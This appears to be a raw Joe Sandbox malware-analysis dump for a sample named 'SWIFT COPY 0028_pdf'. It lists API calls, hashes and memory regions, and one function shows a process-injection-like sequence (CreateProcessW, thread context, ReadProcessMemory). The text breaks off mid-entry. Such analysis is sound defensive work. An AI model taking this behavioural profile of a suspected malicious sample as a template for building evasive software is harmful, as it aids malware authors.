                                                                                    • Opcode ID: c1a6ac8196979b50dcc2b228b84088aefa2c28391fde854d449549ec22694c7f
                                                                                    • Instruction ID: 3f1bb9d87be1dbf86814b5ca6d60140e31e4e12278eeca36e9cb138819bcedba
                                                                                    • Opcode Fuzzy Hash: c1a6ac8196979b50dcc2b228b84088aefa2c28391fde854d449549ec22694c7f
                                                                                    • Instruction Fuzzy Hash: CE11EC70A00206DFDB11BFB48C42FAF76A4AF85354B15C925F419D72D1EB34CA1197B1
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0093D28B,SwapMouseButtons,00000004,?), ref: 0093D2BC
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0093D28B,SwapMouseButtons,00000004,?,?,?,?,0093C865), ref: 0093D2DD
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0093D28B,SwapMouseButtons,00000004,?,?,?,?,0093C865), ref: 0093D2FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: dc03bdfc8d5129d2b9fc05a938b9793ed84452e9098087270a81339efdea10a4
                                                                                    • Instruction ID: 499b1ab0bf252030495b172a89fad779d338ac272451648531cf04c0577bef6e
                                                                                    • Opcode Fuzzy Hash: dc03bdfc8d5129d2b9fc05a938b9793ed84452e9098087270a81339efdea10a4
                                                                                    • Instruction Fuzzy Hash: 51117C75612218BFDB108F64DC84EAF7BBCEF05744F004829F902D7210E6319E40ABA0
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01026943
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010269D9
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010269FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction ID: d24063d7eccb5464e5f467a0f87f5dbeb03949c066903876de768dad0635929f
                                                                                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                    • Instruction Fuzzy Hash: 3B621D30A14218DBEB24DFA4C850BEEB776EF58300F1091A9D50DEB390E7769E81CB59
                                                                                    APIs
                                                                                      • Part of subcall function 00924517: _fseek.LIBCMT ref: 0092452F
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C65D
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C670
                                                                                    • _free.LIBCMT ref: 0096C4DD
                                                                                    • _free.LIBCMT ref: 0096C4E4
                                                                                    • _free.LIBCMT ref: 0096C54F
                                                                                      • Part of subcall function 00941C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00947A85), ref: 00941CB1
                                                                                      • Part of subcall function 00941C9D: GetLastError.KERNEL32(00000000,?,00947A85), ref: 00941CC3
                                                                                    • _free.LIBCMT ref: 0096C557
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    • Opcode ID: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                    • Instruction ID: 183b1dfee9adc32d4858441afdde2f6f8cbea1ce4942a01f1ba7b3fe58165677
                                                                                    • Opcode Fuzzy Hash: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                    • Instruction Fuzzy Hash: B2514DF1A04218AFDF149F64DC81BADBBB9EF88304F1044AEF259E3251DB715A808F59
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0093EBB2
                                                                                      • Part of subcall function 009251AF: _memset.LIBCMT ref: 0092522F
                                                                                      • Part of subcall function 009251AF: _wcscpy.LIBCMT ref: 00925283
                                                                                      • Part of subcall function 009251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00925293
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0093EC07
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0093EC16
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00993C88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: 4b0671c03f6238afde3b2333bc7df151bc3450c7649cca81a4fcbd247888e547
                                                                                    • Instruction ID: 13ae3d0754eb250783dacbaa29658f62682a30b68dbabbcac895d44c38c0805c
                                                                                    • Opcode Fuzzy Hash: 4b0671c03f6238afde3b2333bc7df151bc3450c7649cca81a4fcbd247888e547
                                                                                    • Instruction Fuzzy Hash: 2F21AA71908794AFEB329F288855BEBBBEC9F45308F04444DE6DB56182D3746E84CB51
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00993725
                                                                                    • GetOpenFileNameW.COMDLG32 ref: 0099376F
                                                                                      • Part of subcall function 0092660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009253B1,?,?,009261FF,?,00000000,00000001,00000000), ref: 0092662F
                                                                                      • Part of subcall function 009240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009240C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X
                                                                                    • API String ID: 3777226403-3081909835
                                                                                    • Opcode ID: c830493a516067d285fc9fbf1e87483c6939959d2a6dedeed8885ecaa883ab17
                                                                                    • Instruction ID: 0184e1f7d7054c4416008b6417224238c0dae61ce6686b6e6e2583f1307fd549
                                                                                    • Opcode Fuzzy Hash: c830493a516067d285fc9fbf1e87483c6939959d2a6dedeed8885ecaa883ab17
                                                                                    • Instruction Fuzzy Hash: 6821E771A142A8AFCF11DFD8D845BDEBBFC9F89300F00801AE505AB245DBB45A898F61
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0096C72F
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0096C746
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: d4d940c4a1965adaf671e3b363adad5680709387ff9cf00d0119e23aa1727605
                                                                                    • Instruction ID: db1876f2032c23d693388010002ceb96fc027dc8e4c3b75c57a129c347b2177d
                                                                                    • Opcode Fuzzy Hash: d4d940c4a1965adaf671e3b363adad5680709387ff9cf00d0119e23aa1727605
                                                                                    • Instruction Fuzzy Hash: 6CD05E7554030EABDB10AB90DC0EFCA776C9F00708F0041A17A61A50B1DAB0E699CB95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 781e771930a2c8d9e32cc9cf24d048da2ca1e97f5525b32f45d617bbce2c5f36
                                                                                    • Instruction ID: 267fe8a3e26d7bf86c675bb1eb2f208f9be4b4c47190fe8cc431136290c6059f
                                                                                    • Opcode Fuzzy Hash: 781e771930a2c8d9e32cc9cf24d048da2ca1e97f5525b32f45d617bbce2c5f36
                                                                                    • Instruction Fuzzy Hash: D7F158726083019FCB10DF24C891B6AB7E5FFC8314F14896EF9999B292D734E905CB82
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00925022
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009250CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell__memset
                                                                                    • String ID:
                                                                                    • API String ID: 928536360-0
                                                                                    • Opcode ID: 21e71d50bbc5ab3b6a0256bbbf34adbc47fce5b7bd91b80963473eea66c63b08
                                                                                    • Instruction ID: 12c236c9620f4ff65265421a03234f2bf7b686203350268fa136b0bfd2be33f5
                                                                                    • Opcode Fuzzy Hash: 21e71d50bbc5ab3b6a0256bbbf34adbc47fce5b7bd91b80963473eea66c63b08
                                                                                    • Instruction Fuzzy Hash: CD31D2B0608711CFD720EF24E88169BBBE8FF48305F00092EF69E87251E771A944CB92
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00943973
                                                                                      • Part of subcall function 009481C2: __NMSG_WRITE.LIBCMT ref: 009481E9
                                                                                      • Part of subcall function 009481C2: __NMSG_WRITE.LIBCMT ref: 009481F3
                                                                                    • __NMSG_WRITE.LIBCMT ref: 0094397A
                                                                                      • Part of subcall function 0094821F: GetModuleFileNameW.KERNEL32(00000000,009E0312,00000104,00000000,00000001,00000000), ref: 009482B1
                                                                                      • Part of subcall function 0094821F: ___crtMessageBoxW.LIBCMT ref: 0094835F
                                                                                      • Part of subcall function 00941145: ___crtCorExitProcess.LIBCMT ref: 0094114B
                                                                                      • Part of subcall function 00941145: ExitProcess.KERNEL32 ref: 00941154
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,00000001,00000000,?,?,0093F507,?,0000000E), ref: 0094399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1372826849-0
                                                                                    • Opcode ID: da8580ec71c9f25e316a65cb5bc5e2dcecbb2aaa545e0fa4143faaede153ac8f
                                                                                    • Instruction ID: 862b6608828658d9e5503536e8a2bfeee300153d67842de0b5154ab5740b5345
                                                                                    • Opcode Fuzzy Hash: da8580ec71c9f25e316a65cb5bc5e2dcecbb2aaa545e0fa4143faaede153ac8f
                                                                                    • Instruction Fuzzy Hash: A801B531359245DAE6213B74DC96F2E734C9FC1764F218026F5059B3D2DFF49D4086A0
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0096C385,?,?,?,?,?,00000004), ref: 0096C6F2
                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0096C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0096C708
                                                                                    • CloseHandle.KERNEL32(00000000,?,0096C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0096C70F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                    • String ID:
                                                                                    • API String ID: 3397143404-0
                                                                                    • Opcode ID: 7090496ca75ab8c914f46e7454649d8b00a4e4f31433670ec1cd58b51b0058c5
                                                                                    • Instruction ID: 441ba93dfb93878e18d24f45f646f63af6965887b9960bb356a312a0f9d745af
                                                                                    • Opcode Fuzzy Hash: 7090496ca75ab8c914f46e7454649d8b00a4e4f31433670ec1cd58b51b0058c5
                                                                                    • Instruction Fuzzy Hash: 2EE08632245214B7DB211B54AC09FDE7B18EF06764F104110FB55694E097B1251197D8
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 0096BB72
                                                                                      • Part of subcall function 00941C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00947A85), ref: 00941CB1
                                                                                      • Part of subcall function 00941C9D: GetLastError.KERNEL32(00000000,?,00947A85), ref: 00941CC3
                                                                                    • _free.LIBCMT ref: 0096BB83
                                                                                    • _free.LIBCMT ref: 0096BB95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                    • Instruction ID: 13fcf4b41d5665aee5bd5ca678e80903d3feeab29be133e90c6da44c00bab7fc
                                                                                    • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                    • Instruction Fuzzy Hash: 60E05BA175174147DA3465796E84FB313CC4F45352714081DB49DE7146FF24F8C085B4
                                                                                    APIs
                                                                                      • Part of subcall function 009222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009224F1), ref: 00922303
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009225A1
                                                                                    • CoInitialize.OLE32(00000000), ref: 00922618
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0099503A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3815369404-0
                                                                                    • Opcode ID: 09834a7f9a8de82e0c104345b2f0e59139d767aafaa01b05c7e8787e6dadbe33
                                                                                    • Instruction ID: d580131f039f83fb02ffcc28eb71481a46d6523362e6de1c3efcc2be4c4f297d
                                                                                    • Opcode Fuzzy Hash: 09834a7f9a8de82e0c104345b2f0e59139d767aafaa01b05c7e8787e6dadbe33
                                                                                    • Instruction Fuzzy Hash: FD719CB49293C18BC715EF6AADD0599BBE8BB99344780416EE229CF7B1DB304C40EF15
                                                                                    APIs
                                                                                    • _strcat.LIBCMT ref: 009808FD
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • _wcscpy.LIBCMT ref: 0098098C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1012013722-0
                                                                                    • Opcode ID: 192ec0580935e304b02b3e95c49df6b18e7466b34e50dce1343e071cd790a26c
                                                                                    • Instruction ID: c6f9b69c939d0162639b130dc16e2592ddb95d08d13a3ae52868b8e792060dd2
                                                                                    • Opcode Fuzzy Hash: 192ec0580935e304b02b3e95c49df6b18e7466b34e50dce1343e071cd790a26c
                                                                                    • Instruction Fuzzy Hash: 88915835A00614DFCB58EF28D495AA9B7E5FF89310B51846DE81A8F3A6DB30ED45CF80
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 00923A73
                                                                                      • Part of subcall function 00941405: __lock.LIBCMT ref: 0094140B
                                                                                      • Part of subcall function 00923ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00923AF3
                                                                                      • Part of subcall function 00923ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00923B08
                                                                                      • Part of subcall function 00923D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00923AA3,?), ref: 00923D45
                                                                                      • Part of subcall function 00923D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00923AA3,?), ref: 00923D57
                                                                                      • Part of subcall function 00923D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009E1148,009E1130,?,?,?,?,00923AA3,?), ref: 00923DC8
                                                                                      • Part of subcall function 00923D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00923AA3,?), ref: 00923E48
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00923AB3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                    • String ID:
                                                                                    • API String ID: 924797094-0
                                                                                    • Opcode ID: feb6c576b2bf118403c0a9a38a4349d4401a40470373c1fe9db88b16978d7948
                                                                                    • Instruction ID: 451d99444730ee9d0a97285b63eb168077494f0aa45727e0f53f9f8ce3202f2a
                                                                                    • Opcode Fuzzy Hash: feb6c576b2bf118403c0a9a38a4349d4401a40470373c1fe9db88b16978d7948
                                                                                    • Instruction Fuzzy Hash: 5B11937151C3819BC700EF55E845A1EBBE8EFD5710F00891EF485872B1DB709A84DF92
                                                                                    APIs
                                                                                    • ___lock_fhandle.LIBCMT ref: 0094EA29
                                                                                    • __close_nolock.LIBCMT ref: 0094EA42
                                                                                      • Part of subcall function 00947BDA: __getptd_noexit.LIBCMT ref: 00947BDA
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 1046115767-0
                                                                                    • Opcode ID: 284ddbb5257c16e5e25bcb5c4f9c8021a2edb63eea0b426281544a74c127cda5
                                                                                    • Instruction ID: 0874cfd96906c0e8bd35fc37cf1af42afcd14d16acc1f9e4f610950a0fbcb7ed
                                                                                    • Opcode Fuzzy Hash: 284ddbb5257c16e5e25bcb5c4f9c8021a2edb63eea0b426281544a74c127cda5
                                                                                    • Instruction Fuzzy Hash: FB11A572819A548BD711BFA4C881F597A61BFC2335F264740E4605F2E3DBB48C4097A5
                                                                                    APIs
                                                                                      • Part of subcall function 0094395C: __FF_MSGBANNER.LIBCMT ref: 00943973
                                                                                      • Part of subcall function 0094395C: __NMSG_WRITE.LIBCMT ref: 0094397A
                                                                                      • Part of subcall function 0094395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,00000001,00000000,?,?,0093F507,?,0000000E), ref: 0094399F
                                                                                    • std::exception::exception.LIBCMT ref: 0093F51E
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0093F533
                                                                                      • Part of subcall function 00946805: RaiseException.KERNEL32(?,?,0000000E,009D6A30,?,?,?,0093F538,0000000E,009D6A30,?,00000001), ref: 00946856
                                                                                    Memory Dump Source
